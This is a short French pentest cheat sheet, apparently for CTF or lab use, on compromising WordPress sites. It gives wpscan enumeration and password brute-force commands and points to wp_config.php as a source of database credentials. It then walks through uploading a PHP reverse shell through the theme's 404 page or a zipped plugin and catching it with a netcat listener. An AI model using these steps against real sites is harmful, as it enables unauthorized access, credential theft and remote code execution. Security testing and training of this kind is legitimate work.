WordPress

  1. WordPress

Remarque : Libre à vous de trouver des failles avec d’autres outils comme sqlmap et nmap

WPscan

  • wpscan —-url http://site_ou_ip/wordpress —wp-content-dir -ep -et -eu 
  • wpscan –url http://192.168.1.100/ –enumerate vp,vt,u #Find Vulns
  • Cat /var/www/wordpress/wp_config.php >>>> use database for credentials
  • wpscan -u 10.0.2.4 –wordlist <wordlist>–username <username>  elliot#BRUTEFORCE
  • wpscan –url https://brainfuck.htb/ –disable-tls-checks –enumerate p –enumerate t –enumerate u #enlever le certficat SSL/TLS pour scanner quand meme

Process que j’aime utiliser :

Après être entré dans la partie admin de Worpress grâce aux commandes ci dessus, je vais dans “Apparences”. Dans un page que je peux faire apparaître tel que “404 Not Found”, j’upload un reverse shell en php de mes bon amis les PentestMonkey (PHPreverse_shell). Sinon de base sur Kali il y a des php reverse shell dans /usr/share/webshells/php.Je setup un listener netcat (nc -lnvp <port>) et j’accède à la page sur laquelle j’ai upload mon shell. 

Remarque :  Ne copiez pas bêtements le shell et pensez à modifier les paramètres qu’il faut .

Astuce :  Vous pouvez aussi uploader un plugin, il suffit de zipper votre shell dans un zip et de l’upload  dans la partie “Application”

Vous vous retrouvez avec un shell sur le serveur (TADAM) !